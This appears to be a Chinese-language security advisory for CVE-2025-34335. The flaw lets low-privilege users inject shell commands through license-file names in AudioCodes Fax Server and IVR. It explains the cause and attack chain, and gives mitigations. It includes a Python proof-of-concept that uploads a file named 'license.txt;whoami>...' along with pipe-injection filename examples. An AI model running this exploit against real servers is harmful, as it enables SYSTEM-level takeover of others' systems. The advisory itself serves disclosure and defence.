CVE-2025-34335 AudioCodes Fax Server 授权激活命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-34335

漏洞类型

命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

AudioCodes Fax Server, AudioCodes Auto-Attendant IVR

漏洞概述

CVE-2025-34335是AudioCodes Fax Server和Auto-Attendant IVR设备中存在的一个高危命令注入漏洞。该漏洞存在于授权激活工作流程中，具体位于AudioCodes_files/ActivateLicense.php文件。当用户上传许可证文件时，应用程序会根据生成的基础名称与攻击者可控的原始上传文件扩展名组合成新的文件名，然后为fax_server_lic_cmdline.exe构建命令行参数。扩展名值在未经过输入验证、转义或正确参数引用的情况下被直接拼接到命令字符串中，并传递给exec()函数执行。攻击者只需拥有低权限账户并访问许可证上传界面，即可通过精心构造的文件名扩展名注入任意Shell命令，最终以NT AUTHORITY\SYSTEM权限执行系统命令。CVSS评分8.8，属于高危漏洞，对系统机密性、完整性和可用性均造成严重影响。

技术细节

该漏洞的根本原因在于用户输入未经过适当的安全处理就直接参与系统命令构建。具体流程如下：1) 攻击者上传许可证文件，文件名如malicious.txt|whoami.exe；2) 应用程序提取文件名中的扩展名部分作为新文件名的一部分；3) 构建命令时将扩展名直接拼接到命令行中，未进行任何转义或验证；4) 最终执行的命令类似：fax_server_lic_cmdline.exe C:\path\base_malicious.txt|whoami.exe；5) 由于管道符|的作用，whoami命令将被执行。攻击者可以利用各种Shell元字符如|、&、;、$、``等来实现命令注入。此漏洞需要认证才能利用，但低权限用户即可完成攻击，无需管理员权限。成功利用后可完全控制服务器，以最高权限NT AUTHORITY\SYSTEM执行任意命令。

攻击链分析

STEP 1

步骤1

攻击者获取目标AudioCodes Fax Server或Auto-Attendant IVR的低权限账户

STEP 2

步骤2

访问许可证上传界面(AudioCodes_files/ActivateLicense.php)

STEP 3

步骤3

构造包含Shell元字符的恶意文件名，如license.txt|whoami

STEP 4

步骤4

上传恶意许可证文件，应用程序提取扩展名时未进行安全验证

STEP 5

步骤5

构建命令时将扩展名直接拼接到fax_server_lic_cmdline.exe命令行中

STEP 6

步骤6

通过管道符等元字符注入命令，以NT AUTHORITY\SYSTEM权限执行

STEP 7

步骤7

攻击者获得服务器完全控制权，可执行任意系统命令

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3 """ CVE-2025-34335 AudioCodes Fax Server Authenticated Command Injection PoC Author: VulnCheck ([email protected]) """ import requests import sys TARGET = "https://target-audiocodes-server.com" USERNAME = "low_privilege_user" PASSWORD = "user_password" def exploit(): """Exploit the command injection via license file upload""" # Create malicious license file with command injection in filename # The extension part will be used without sanitization malicious_filename = "license.txt;whoami>../../webroot/pwned.txt" # Login to get authenticated session session = requests.Session() login_url = f"{TARGET}/AudioCodes_files/login.php" login_data = { "username": USERNAME, "password": PASSWORD } print(f"[*] Logging in as {USERNAME}...") response = session.post(login_url, data=login_data) if response.status_code != 200: print("[-] Login failed") return False print("[+] Login successful") # Upload malicious license file upload_url = f"{TARGET}/AudioCodes_files/ActivateLicense.php" files = { "license_file": (malicious_filename, b"malicious_license_content", "application/octet-stream") } print(f"[*] Uploading malicious license file: {malicious_filename}") response = session.post(upload_url, files=files) if response.status_code == 200: print("[+] Payload delivered successfully") print("[*] Check if command was executed on target system") return True else: print(f"[-] Upload failed with status: {response.status_code}") return False if __name__ == "__main__": exploit()

影响范围

AudioCodes Fax Server <= 2.6.23

AudioCodes Auto-Attendant IVR <= 2.6.23

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时缓解措施：1) 限制许可证上传功能的访问权限，仅允许受信任的管理员使用；2) 实施严格的文件名验证策略，禁止文件名中包含特殊字符；3) 监控和审计所有许可证上传操作；4) 考虑暂时禁用许可证激活功能；5) 部署入侵检测系统监控可疑的命令执行行为。由于该漏洞需要认证才能利用，优先保护账户安全、采用强密码策略和双因素认证可有效降低被利用风险。